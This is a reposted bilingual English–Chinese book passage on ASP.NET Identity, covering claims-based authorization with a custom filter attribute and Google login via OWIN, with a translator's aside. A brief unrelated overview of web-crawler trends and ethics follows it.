Listing 15-19. Adding a New Action Method to the ClaimsController.cs File 清单15-19. 在ClaimsController.cs文件中添加一个新的动作方法 using System.Security.Claims;using System.Web;using System.Web.Mvc;namespace Users.Controllers {public class ClaimsController : Controller {[Authorize]public ActionResult Index() {ClaimsIdentity ident = HttpContext.User.Identity as ClaimsIdentity;if (ident == null) {return View("Error", new string[] { "No claims available" });} else {return View(ident.Claims);} } [Authorize(Roles="DCStaff")]public string OtherAction() {return "This is the protected action";} }} Users will be able to access OtherAction only if their claims grant them membership to the DCStaff role. Membership of this role is generated dynamically, so a change to the user’s employment status or location information will change their authorization level. 只要用户的声明(Claims)承认他们是DCStaff角色的成员,那么他们便能访问OtherAction动作。该角色的成员是动态生成的,因此,若是用户的雇用状态或地点信息发生变化,也会改变他们的授权等级。 提示:请读者从这个例子中吸取其中的思想精髓。对于读物的理解程度,仁者见仁,智者见智,能领悟多少,全凭各人,译者感觉这里的思想有无数的可能。举例说明:(1)可以根据用户的身份进行授权,比如学生在校时是“学生”,毕业后便是“校友”;(2)可以根据用户所处的部门进行授权,人事部用户属于人事团队,销售部用户属于销售团队,各团队有其自己的应用;(3)下一小节的示例是根据用户的地点授权。简言之:一方面用户的各种声明(Claim)都可以用来进行授权;另一方面用户的声明(Claim)又是可以自定义的。于是可能的运用就无法估计了。总之一句话,这种基于声明的授权(Claims-Based Authorization)有无限可能!要是没有我这里的提示,是否所有读者在此处都会有所体会?——译者注 15.3.3 Authorizing Access Using Claims 15.3.3 使用声明(Claims)授权访问 The previous example is an effective demonstration of how claims can be used to keep authorizations fresh and accurate, but it is a little indirect because I generate roles based on claims data and then enforce my authorization policy based on the membership of that role. A more direct and flexible approach is to enforce authorization directly by creating a custom authorization filter attribute. Listing 15-20 shows the contents of the ClaimsAccessAttribute.cs file, which I added to the Infrastructure folder and used to create such a filter. 前面的示例有效地演示了如何用声明(Claims)来保持新鲜和准确的授权,但有点不太直接,因为我要根据声明(Claims)数据来生成了角色,然后强制我的授权策略基于角色成员。一个更直接且灵活的办法是直接强制授权,其做法是创建一个自定义的授权过滤器注解属性。清单15-20演示了ClaimsAccessAttribute.cs文件的内容,我将它添加在Infrastructure文件夹中,并用它创建了这种过滤器。 Listing 15-20. The Contents of the ClaimsAccessAttribute.cs File 清单15-20. ClaimsAccessAttribute.cs文件的内容 using System.Security.Claims;using System.Web;using System.Web.Mvc; namespace Users.Infrastructure {public class ClaimsAccessAttribute : AuthorizeAttribute {public string Issuer { get; set; }public string ClaimType { get; set; }public string Value { get; set; }protected override bool AuthorizeCore(HttpContextBase context) {return context.User.Identity.IsAuthenticated&& context.User.Identity is ClaimsIdentity&& ((ClaimsIdentity)context.User.Identity).HasClaim(x =>x.Issuer == Issuer && x.Type == ClaimType && x.Value == Value);} }} The attribute I have defined is derived from the AuthorizeAttribute class, which makes it easy to create custom authorization policies in MVC framework applications by overriding the AuthorizeCore method. My implementation grants access if the user is authenticated, the IIdentity implementation is an instance of ClaimsIdentity, and the user has a claim with the issuer, type, and value matching the class properties. Listing 15-21 shows how I applied the attribute to the Claims controller to authorize access to the OtherAction method based on one of the location claims created by the LocationClaimsProvider class. 我所定义的这个注解属性派生于AuthorizeAttribute类,通过重写AuthorizeCore方法,很容易在MVC框架应用程序中创建自定义的授权策略。在这个实现中,若用户是已认证的、其IIdentity实现是一个ClaimsIdentity实例,而且该用户有一个带有issuer、type以及value的声明(Claim),它们与这个类的属性是匹配的,则该用户便是允许访问的。清单15-21显示了如何将这个注解属性运用于Claims控制器,以便根据LocationClaimsProvider类创建的地点声明(Claim),对OtherAction方法进行授权访问。 Listing 15-21. Performing Authorization on Claims in the ClaimsController.cs File 清单15-21. 在ClaimsController.cs文件中执行基于声明的授权 using System.Security.Claims;using System.Web;using System.Web.Mvc;using Users.Infrastructure;namespace Users.Controllers {public class ClaimsController : Controller {[Authorize]public ActionResult Index() {ClaimsIdentity ident = HttpContext.User.Identity as ClaimsIdentity;if (ident == null) {return View("Error", new string[] { "No claims available" });} else {return View(ident.Claims);} } [ClaimsAccess(Issuer="RemoteClaims", ClaimType=ClaimTypes.PostalCode,Value="DC 20500")]public string OtherAction() {return "This is the protected action";} }} My authorization filter ensures that only users whose location claims specify a ZIP code of DC 20500 can invoke the OtherAction method. 这个授权过滤器能够确保只有地点声明(Claim)的邮编为DC 20500的用户才能请求OtherAction方法。 15.4 Using Third-Party Authentication 15.4 使用第三方认证 One of the benefits of a claims-based system such as ASP.NET Identity is that any of the claims can come from an external system, even those that identify the user to the application. This means that other systems can authenticate users on behalf of the application, and ASP.NET Identity builds on this idea to make it simple and easy to add support for authenticating users through third parties such as Microsoft, Google, Facebook, and Twitter. 基于声明的系统,如ASP.NET Identity,的好处之一是任何声明都可以来自于外部系统,即使是将用户标识到应用程序的那些声明。这意味着其他系统可以代表应用程序来认证用户,而ASP.NET Identity就建立在这样的思想之上,使之能够简单而方便地添加第三方认证用户的支持,如微软、Google、Facebook、Twitter等。 There are some substantial benefits of using third-party authentication: Many users will already have an account, users can elect to use two-factor authentication, and you don’t have to manage user credentials in the application. In the sections that follow, I’ll show you how to set up and use third-party authentication for Google users, which Table 15-8 puts into context. 使用第三方认证有一些实际的好处:许多用户已经有了账号、用户可以选择使用双因子认证、你不必在应用程序中管理用户凭据等等。在以下小节中,我将演示如何为Google用户建立并使用第三方认证,表15-8描述了事情的情形。 Table 15-8. Putting Third-Party Authentication in Context 表15-8. 第三方认证情形 Question 问题 Answer 回答 What is it? 什么是第三方认证? Authenticating with third parties lets you take advantage of the popularity of companies such as Google and Facebook. 第三方认证使你能够利用流行公司,如Google和Facebook,的优势。 Why should I care? 为何要关心它? Users don’t like having to remember passwords for many different sites. Using a provider with large-scale adoption can make your application more appealing to users of the provider’s services. 用户不喜欢记住许多不同网站的口令。使用大范围适应的提供器可使你的应用程序更吸引有提供器服务的用户。 How is it used by the MVC framework? 如何在MVC框架中使用它? This feature isn’t used directly by the MVC framework. 这不是一个直接由MVC框架使用的特性。 Note The reason I have chosen to demonstrate Google authentication is that it is the only option that doesn’t require me to register my application with the authentication service. You can get details of the registration processes required at http://bit.ly/1cqLTrE. 提示:我选择演示Google认证的原因是,它是唯一不需要在其认证服务中注册我应用程序的公司。有关认证服务注册过程的细节,请参阅http://bit.ly/1cqLTrE。 15.4.1 Enabling Google Authentication 15.4.1 启用Google认证 ASP.NET Identity comes with built-in support for authenticating users through their Microsoft, Google, Facebook, and Twitter accounts as well more general support for any authentication service that supports OAuth. The first step is to add the NuGet package that includes the Google-specific additions for ASP.NET Identity. Enter the following command into the Package Manager Console: ASP.NET Identity带有通过Microsoft、Google、Facebook以及Twitter账号认证用户的内建支持,并且对于支持OAuth的认证服务具有更普遍的支持。第一个步骤是添加NuGet包,包中含有用于ASP.NET Identity的Google专用附件。请在“Package Manager Console(包管理器控制台)”中输入以下命令: Install-Package Microsoft.Owin.Security.Google -version 2.0.2 There are NuGet packages for each of the services that ASP.NET Identity supports, as described in Table 15-9. 对于ASP.NET Identity支持的每一种服务都有相应的NuGet包,如表15-9所示。 Table 15-9. The NuGet Authenticaton Packages 表15-9. NuGet认证包 Name 名称 Description 描述 Microsoft.Owin.Security.Google Authenticates users with Google accounts 用Google账号认证用户 Microsoft.Owin.Security.Facebook Authenticates users with Facebook accounts 用Facebook账号认证用户 Microsoft.Owin.Security.Twitter Authenticates users with Twitter accounts 用Twitter账号认证用户 Microsoft.Owin.Security.MicrosoftAccount Authenticates users with Microsoft accounts 用Microsoft账号认证用户 Microsoft.Owin.Security.OAuth Authenticates users against any OAuth 2.0 service 根据任一OAuth 2.0服务认证用户 Once the package is installed, I enable support for the authentication service in the OWIN startup class, which is defined in the App_Start/IdentityConfig.cs file in the example project. Listing 15-22 shows the change that I have made. 一旦安装了这个包,便可以在OWIN启动类中启用此项认证服务的支持,启动类的定义在示例项目的App_Start/IdentityConfig.cs文件中。清单15-22显示了所做的修改。 Listing 15-22. Enabling Google Authentication in the IdentityConfig.cs File 清单15-22. 在IdentityConfig.cs文件中启用Google认证 using Microsoft.AspNet.Identity;using Microsoft.Owin;using Microsoft.Owin.Security.Cookies;using Owin;using Users.Infrastructure;using Microsoft.Owin.Security.Google;namespace Users {public class IdentityConfig {public void Configuration(IAppBuilder app) {app.CreatePerOwinContext<AppIdentityDbContext>(AppIdentityDbContext.Create);app.CreatePerOwinContext<AppUserManager>(AppUserManager.Create);app.CreatePerOwinContext<AppRoleManager>(AppRoleManager.Create); app.UseCookieAuthentication(new CookieAuthenticationOptions {AuthenticationType = DefaultAuthenticationTypes.ApplicationCookie,LoginPath = new PathString("/Account/Login"),}); app.UseExternalSignInCookie(DefaultAuthenticationTypes.ExternalCookie);app.UseGoogleAuthentication();} }} Each of the packages that I listed in Table 15-9 contains an extension method that enables the corresponding service. The extension method for the Google service is called UseGoogleAuthentication, and it is called on the IAppBuilder implementation that is passed to the Configuration method. 表15-9所列的每个包都含有启用相应服务的扩展方法。用于Google服务的扩展方法名称为UseGoogleAuthentication,它通过传递给Configuration方法的IAppBuilder实现进行调用。 Next I added a button to the Views/Account/Login.cshtml file, which allows users to log in via Google. You can see the change in Listing 15-23. 下一步骤是在Views/Account/Login.cshtml文件中添加一个按钮,让用户能够通过Google进行登录。所做的修改如清单15-23所示。 Listing 15-23. Adding a Google Login Button to the Login.cshtml File 清单15-23. 在Login.cshtml文件中添加Google登录按钮 @model Users.Models.LoginModel@{ ViewBag.Title = "Login";}<h2>Log In</h2> @Html.ValidationSummary()@using (Html.BeginForm()) {@Html.AntiForgeryToken();<input type="hidden" name="returnUrl" value="@ViewBag.returnUrl" /><div class="form-group"><label>Name</label>@Html.TextBoxFor(x => x.Name, new { @class = "form-control" })</div><div class="form-group"><label>Password</label>@Html.PasswordFor(x => x.Password, new { @class = "form-control" })</div><button class="btn btn-primary" type="submit">Log In</button>}@using (Html.BeginForm("GoogleLogin", "Account")) {<input type="hidden" name="returnUrl" value="@ViewBag.returnUrl" /><button class="btn btn-primary" type="submit">Log In via Google</button>} The new button submits a form that targets the GoogleLogin action on the Account controller. You can see this method—and the other changes I made the controller—in Listing 15-24. 新按钮递交一个表单,目标是Account控制器中的GoogleLogin动作。可从清单15-24中看到该方法,以及在控制器中所做的其他修改。 Listing 15-24. Adding Support for Google Authentication to the AccountController.cs File 清单15-24. 在AccountController.cs文件中添加Google认证支持 using System.Threading.Tasks;using System.Web.Mvc;using Users.Models;using Microsoft.Owin.Security;using System.Security.Claims;using Microsoft.AspNet.Identity;using Microsoft.AspNet.Identity.Owin;using Users.Infrastructure;using System.Web; namespace Users.Controllers {[Authorize]public class AccountController : Controller {[AllowAnonymous]public ActionResult Login(string returnUrl) {if (HttpContext.User.Identity.IsAuthenticated) {return View("Error", new string[] { "Access Denied" });}ViewBag.returnUrl = returnUrl;return View();}[HttpPost][AllowAnonymous][ValidateAntiForgeryToken]public async Task<ActionResult> Login(LoginModel details, string returnUrl) {if (ModelState.IsValid) {AppUser user = await UserManager.FindAsync(details.Name,details.Password);if (user == null) {ModelState.AddModelError("", "Invalid name or password.");} else {ClaimsIdentity ident = await UserManager.CreateIdentityAsync(user,DefaultAuthenticationTypes.ApplicationCookie); ident.AddClaims(LocationClaimsProvider.GetClaims(ident));ident.AddClaims(ClaimsRoles.CreateRolesFromClaims(ident)); AuthManager.SignOut();AuthManager.SignIn(new AuthenticationProperties {IsPersistent = false}, ident);return Redirect(returnUrl);} }ViewBag.returnUrl = returnUrl;return View(details);} [HttpPost][AllowAnonymous]public ActionResult GoogleLogin(string returnUrl) {var properties = new AuthenticationProperties {RedirectUri = Url.Action("GoogleLoginCallback",new { returnUrl = returnUrl})};HttpContext.GetOwinContext().Authentication.Challenge(properties, "Google");return new HttpUnauthorizedResult();}[AllowAnonymous]public async Task<ActionResult> GoogleLoginCallback(string returnUrl) {ExternalLoginInfo loginInfo = await AuthManager.GetExternalLoginInfoAsync();AppUser user = await UserManager.FindAsync(loginInfo.Login);if (user == null) {user = new AppUser {Email = loginInfo.Email,UserName = loginInfo.DefaultUserName,City = Cities.LONDON, Country = Countries.UK};IdentityResult result = await UserManager.CreateAsync(user);if (!result.Succeeded) {return View("Error", result.Errors);} else {result = await UserManager.AddLoginAsync(user.Id, loginInfo.Login);if (!result.Succeeded) {return View("Error", result.Errors);} }}ClaimsIdentity ident = await UserManager.CreateIdentityAsync(user,DefaultAuthenticationTypes.ApplicationCookie);ident.AddClaims(loginInfo.ExternalIdentity.Claims);AuthManager.SignIn(new AuthenticationProperties {IsPersistent = false }, ident);return Redirect(returnUrl ?? "/");}[Authorize]public ActionResult Logout() {AuthManager.SignOut();return RedirectToAction("Index", "Home");}private IAuthenticationManager AuthManager {get {return HttpContext.GetOwinContext().Authentication;} }private AppUserManager UserManager {get {return HttpContext.GetOwinContext().GetUserManager<AppUserManager>();} }} } The GoogleLogin method creates an instance of the AuthenticationProperties class and sets the RedirectUri property to a URL that targets the GoogleLoginCallback action in the same controller. The next part is a magic phrase that causes ASP.NET Identity to respond to an unauthorized error by redirecting the user to the Google authentication page, rather than the one defined by the application: GoogleLogin方法创建了AuthenticationProperties类的一个实例,并为RedirectUri属性设置了一个URL,其目标为同一控制器中的GoogleLoginCallback动作。下一个部分是一个神奇阶段,通过将用户重定向到Google认证页面,而不是应用程序所定义的认证页面,让ASP.NET Identity对未授权的错误进行响应: ...HttpContext.GetOwinContext().Authentication.Challenge(properties, "Google");return new HttpUnauthorizedResult();... This means that when the user clicks the Log In via Google button, their browser is redirected to the Google authentication service and then redirected back to the GoogleLoginCallback action method once they are authenticated. 这意味着,当用户通过点击Google按钮进行登录时,浏览器被重定向到Google的认证服务,一旦在那里认证之后,便被重定向回GoogleLoginCallback动作方法。 I get details of the external login by calling the GetExternalLoginInfoAsync of the IAuthenticationManager implementation, like this: 我通过调用IAuthenticationManager实现的GetExternalLoginInfoAsync方法,我获得了外部登录的细节,如下所示: ...ExternalLoginInfo loginInfo = await AuthManager.GetExternalLoginInfoAsync();... The ExternalLoginInfo class defines the properties shown in Table 15-10. ExternalLoginInfo类定义的属性如表15-10所示: Table 15-10. The Properties Defined by the ExternalLoginInfo Class 表15-10. ExternalLoginInfo类所定义的属性 Name 名称 Description 描述 DefaultUserName Returns the username 返回用户名 Email Returns the e-mail address 返回E-mail地址 ExternalIdentity Returns a ClaimsIdentity that identities the user 返回标识该用户的ClaimsIdentity Login Returns a UserLoginInfo that describes the external login 返回描述外部登录的UserLoginInfo I use the FindAsync method defined by the user manager class to locate the user based on the value of the ExternalLoginInfo.Login property, which returns an AppUser object if the user has been authenticated with the application before: 我使用了由用户管理器类所定义的FindAsync方法,以便根据ExternalLoginInfo.Login属性的值对用户进行定位,如果用户之前在应用程序中已经认证,该属性会返回一个AppUser对象: ...AppUser user = await UserManager.FindAsync(loginInfo.Login);... If the FindAsync method doesn’t return an AppUser object, then I know that this is the first time that this user has logged into the application, so I create a new AppUser object, populate it with values, and save it to the database. I also save details of how the user logged in so that I can find them next time: 如果FindAsync方法返回的不是AppUser对象,那么我便知道这是用户首次登录应用程序,于是便创建了一个新的AppUser对象,填充该对象的值,并将其保存到数据库。我还保存了用户如何登录的细节,以便下次能够找到他们: ...result = await UserManager.AddLoginAsync(user.Id, loginInfo.Login);... All that remains is to generate an identity the user, copy the claims provided by Google, and create an authentication cookie so that the application knows the user has been authenticated: 剩下的事情只是生成该用户的标识了,拷贝Google提供的声明(Claims),并创建一个认证Cookie,以使应用程序知道此用户已认证: ...ClaimsIdentity ident = await UserManager.CreateIdentityAsync(user,DefaultAuthenticationTypes.ApplicationCookie);ident.AddClaims(loginInfo.ExternalIdentity.Claims);AuthManager.SignIn(new AuthenticationProperties { IsPersistent = false }, ident);... 15.4.2 Testing Google Authentication 15.4.2 测试Google认证 There is one further change that I need to make before I can test Google authentication: I need to change the account verification I set up in Chapter 13 because it prevents accounts from being created with e-mail addresses that are not within the example.com domain. Listing 15-25 shows how I removed the verification from the AppUserManager class. 在测试Google认证之前还需要一处修改:需要修改第13章所建立的账号验证,因为它不允许example.com域之外的E-mail地址创建账号。清单15-25显示了如何在AppUserManager类中删除这种验证。 Listing 15-25. Disabling Account Validation in the AppUserManager.cs File 清单15-25. 在AppUserManager.cs文件中取消账号验证 using Microsoft.AspNet.Identity;using Microsoft.AspNet.Identity.EntityFramework;using Microsoft.AspNet.Identity.Owin;using Microsoft.Owin;using Users.Models; namespace Users.Infrastructure {public class AppUserManager : UserManager<AppUser> {public AppUserManager(IUserStore<AppUser> store): base(store) {}public static AppUserManager Create(IdentityFactoryOptions<AppUserManager> options,IOwinContext context) {AppIdentityDbContext db = context.Get<AppIdentityDbContext>();AppUserManager manager = new AppUserManager(new UserStore<AppUser>(db)); manager.PasswordValidator = new CustomPasswordValidator {RequiredLength = 6,RequireNonLetterOrDigit = false,RequireDigit = false,RequireLowercase = true,RequireUppercase = true}; //manager.UserValidator = new CustomUserValidator(manager) {// AllowOnlyAlphanumericUserNames = true,// RequireUniqueEmail = true//};return manager;} }} Tip you can use validation for externally authenticated accounts, but I am just going to disable the feature for simplicity. 提示:也可以使用外部已认证账号的验证,但这里出于简化,取消了这一特性。 To test authentication, start the application, click the Log In via Google button, and provide the credentials for a valid Google account. When you have completed the authentication process, your browser will be redirected back to the application. If you navigate to the /Claims/Index URL, you will be able to see how claims from the Google system have been added to the user’s identity, as shown in Figure 15-7. 为了测试认证,启动应用程序,通过点击“Log In via Google(通过Google登录)”按钮,并提供有效的Google账号凭据。当你完成了认证过程时,浏览器将被重定向回应用程序。如果导航到/Claims/Index URL,便能够看到来自Google系统的声明(Claims),已被添加到用户的标识中了,如图15-7所示。 Figure 15-7. Claims from Google 图15-7. 来自Google的声明(Claims) 15.5 Summary 15.5 小结 In this chapter, I showed you some of the advanced features that ASP.NET Identity supports. I demonstrated the use of custom user properties and how to use database migrations to preserve data when you upgrade the schema to support them. I explained how claims work and how they can be used to create more flexible ways of authorizing users. I finished the chapter by showing you how to authenticate users via Google, which builds on the ideas behind the use of claims. 本章向你演示了ASP.NET Identity所支持的一些高级特性。演示了自定义用户属性的使用,还演示了在升级数据架构时,如何使用数据库迁移保护数据。我解释了声明(Claims)的工作机制,以及如何将它们用于创建更灵活的用户授权方式。最后演示了如何通过Google进行认证结束了本章,这是建立在使用声明(Claims)的思想基础之上的。 本篇文章为转载内容。原文链接:https://blog.csdn.net/gz19871113/article/details/108591802。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
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...免费SSL证书的广泛部署,使得HTTP站点向HTTPS过渡成为主流趋势。这对网络爬虫而言意味着必须更新应对策略,理解和适配不同类型的SSL证书验证机制。 3. 反爬策略的技术演进与对策研究:面对日益复杂的网站反爬机制,诸如基于用户行为分析、动态验证码、IP封锁等手段层出不穷。研究人员正在探索更先进的模拟登录方法和维持session活性技术,同时利用AI图像识别技术破解复杂验证码也成为业界热门话题。 4. 网络爬虫伦理与法律边界探讨:在实际应用中,网络爬虫技术往往涉及道德和法律问题。例如,未经许可抓取受版权保护的内容或侵犯用户隐私。相关案例引发了关于合理使用网络爬虫、尊重数据来源权和用户知情权的深入讨论,这对于指导开发者正确运用cookie和session管理用户状态具有重要意义。 综上所述,无论是从技术层面还是法律伦理角度,处理不信任SSL证书、cookie和session的相关知识都是网络爬虫领域发展的重要组成部分。不断跟进相关政策变化和技术演进,将有助于我们更好地在遵守规则的前提下进行有效的数据采集和分析工作。
2023-03-01 12:40:55
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